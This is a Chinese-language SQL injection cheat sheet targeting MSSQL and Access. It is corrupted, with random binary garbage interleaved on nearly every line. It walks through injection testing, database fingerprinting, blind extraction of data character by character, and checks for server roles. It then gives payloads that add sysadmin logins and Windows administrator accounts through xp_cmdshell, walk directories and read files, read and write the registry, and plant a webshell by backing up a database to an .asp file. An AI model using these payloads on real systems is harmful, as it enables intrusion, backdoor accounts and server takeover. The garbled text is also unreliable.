1.判断是否有注入;and 1=1 ;and 1=2 �1.5lJ:[G�
2.初步判断是否是mssql ;and user>0 �|B0.�*te6
$S|2'��jc�
3.注入参数是字符'and [查询条件] and ''=' �8/4Gr8��o
wG&�+�*,�}
4.搜索时没过滤参数的'and [查询条件] and '%25'=' HOb�-q�|�w
��uy,ySBY�
5.判断数据库系统 A{7N#�-h_
_z3H�l?qk=
;and (select count(*) from sysobjects)>0 mssql 5xE�k �7g.
gUrb�&#\X�
;and (select count(*) from msysobjects)>0 access TF@H��wF"#
{]a� 6o[}u
�R+s_�u�wS
jJ'�� LM>e
6.猜数据库 ;and (select Count(*) from [数据库名])>0 ��,0~/ Cn
�M~�G1Z��B
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 qM$~5uu��
Nr#Y�]9n�A
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 Hx�VQeyOR�
��})l+-H"
9.(1)猜字段的ascii值(access) =&-�hU�|ur
[SW�@�"�C!
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 ^z[�-pT��Y
LX
%8�a^?;
(2)猜字段的ascii值(mssql) c��Z"
��Ut
's]+.3">L1
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 _n3Jf�<��Y
Oc]&��1>M�
10.测试权限结构(mssql) I:~L�!���%
z"e�h�.&�T
�J6�!t"eB+
��;,z^!b�D
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- g>[|/�z �P
W
b�iUz2)�
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- oadlyqlw#
=](c7HEQ�f
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- ���TwZvz[u
��qdn\8P�n
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- q�5$z:'zE�
mX8A X�WIa
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- %5_eos&<^)
�,�u}n!quA
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- EO|r������
))n7.pB�9/
;and 1=(select IS_MEMBER('db_owner'));-- �N�RS�!O�x
@"�~�Mglgw
N_v��VEIO9
%@�!��V�x�
11.添加mssql和系统的帐户 HY]�va�A`�
{PM)D [$�i
;exec master.dbo.sp_addlogin username;-- ���X;5U@l
;exec master.dbo.sp_password null,username,password;-- ��X7�sWu{n
tPS.r�.0#^
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- Mwxf�TH"wi
Q<L.!%v�u}
;exec master.dbo.xp_cmdshell 'net user username password ,EgIH%*�g
[@}{sH(#Ta
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';--
mI=^7�'Mk
�pGi "*oZD
;exec master.dbo.xp_cmdshell 'net user username password /add';-- ���@�1��#$
�*�JG?^G"l
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- �6e@�
O88=
^g,�[#R�h�
cU2�5]V^{\
r\Wp\LfY&{
12.(1)遍历目录 j$*]'s&_hZ
XM/�P2�=;�
;create table dirs(paths varchar(100), id int) �+a&-'`7�g
+���q���]
;insert dirs exec master.dbo.xp_dirtree 'c:\' a9GOY+;bf
b`n+[UCPtn
;and (select top 1 paths from dirs)>0 h2��Ifq!(:
oH�m��U�|�
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) <69/ZI),Y{
�/KE�PP�p�
g�1��\�4Jb
u[U~`*i*rA
(2)遍历目录 gKg2Ntx��j
�8w|j Z@�
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- y���I9l*�'
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 x�Z@H{)��:
b?o�T|��@�
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 �V�Ed#LSh�
O0"i>��}g4
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 a�4,�b�P*H
Do(7Li�dC5
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 �qy@gW@�IU
����[E(DGt
J�`O4]XRY
1!�\!3xa�V
13.mssql中的存储过程 xIF
z@�9+k
Rl��X;c�!K
xp_regenumvalues 注册表根键, 子键 GI�$�t�8{M
�',0~��\�V
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 )��BTJs)E�
]}�9�y>+�>
xp_regread 根键,子键,键值名 $B4}('&4FQ
,"P�wN�v�
;exec xp_regread iQ-;�0<�=G
)�dLE��S�k
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 i{V�j�SW�q
ja~b5T��f9
xp_regwrite 根键,子键, 值名, 值类型, 值 Ta!�.oC[�
g\
@��nA4
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 �n/s!S ��&
*6�R�l[eXS
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 'N��5qX>Ob
O6;���>]/`
xp_regdeletevalue 根键,子键,值名 m7kD�xs(KO
$BE^'5G&4Y
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 ��~�u8}s4�
tZa)�s��bz
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 B>o\;)�l3O
vD) LR�O
Z
sc�qG$~O)�
�1q~U3'l:$
14.mssql的backup创建webshell �jjvm<;lv
��.,,?[T�I
use model �T]��EXm/�
Sct-,��K%i
create table cmd(str image); Vw9��^otJu
�N>Y`>�5��
insert into cmd(str) values (''); Dt1{�]~3�0
f�\~e&�`PV
backup database model to disk='c:\l.asp'; v5w��I�?HE
@D"�#B��@j
q�)� /;|h�
%8$J�L�=c�
15.mssql内置函数 ^i-%FY_i5}
yL.si�)h(p
;and (select @@version)>0 获得Windows的版本号 '�A���!Dg�
�WGG|d)�'@
;and user_name()='dbo' 判断当前系统的连接用户是不是sa B0���q!�[�
8t}=?:�B+{
;and (select user_name())>0 爆当前系统的连接用户 ��^S�y\�<�
l$�,��l��3
;and (select db_name())>0 得到当前连接的数据库 �*�&�UV�r�
y%TR�2Cv�T
'cw0Fp�Q;�
�<l wI|��<
16.简洁的webshell q�9WdJ!-^X
UXQ�{J5Ox+
use model ��l,�*Q?q�
":7cZ1�VN2
create table cmd(str image); 8<!�qT��1�
#A]�7cMZ'W
insert into cmd(str) values (''); b�daZ{5^�{
dhK$����XG
backup database model to disk='g:\wwwtest\l.asp';
